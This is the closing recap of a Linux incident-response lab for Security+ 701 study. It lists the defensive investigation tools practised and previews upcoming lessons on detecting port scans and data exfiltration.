What You Learned in This Lab
Over this exercise you practiced real incident response workflow used by SOC analysts:
Network Investigation
ss
lsof
tshark
Process Investigation
ps
top
kill
Persistence Detection
cron
system services
startup files
Log Analysis
journalctl
login history
command history
These skills map directly to Security+ 701 Security Operations (Domain 4).
Where We Are in Your Study Plan
You have now practiced most of the Security+ 701 monitoring and investigation concepts that Professor Messer explains in sections 4.1–4.9.
You learned them hands-on using Linux, which is the best way to retain them.
Before We Continue Tomorrow
Tomorrow we can move into the next powerful topics:
1️⃣ Detecting port scans and attackers on your network
2️⃣ Building a small monitoring lab using packet capture
3️⃣ Detecting data exfiltration
4️⃣ Using Python to automate threat detection
These will strengthen both your Linux and Python skills, which you mentioned earlier you want to build.
Top comments (0)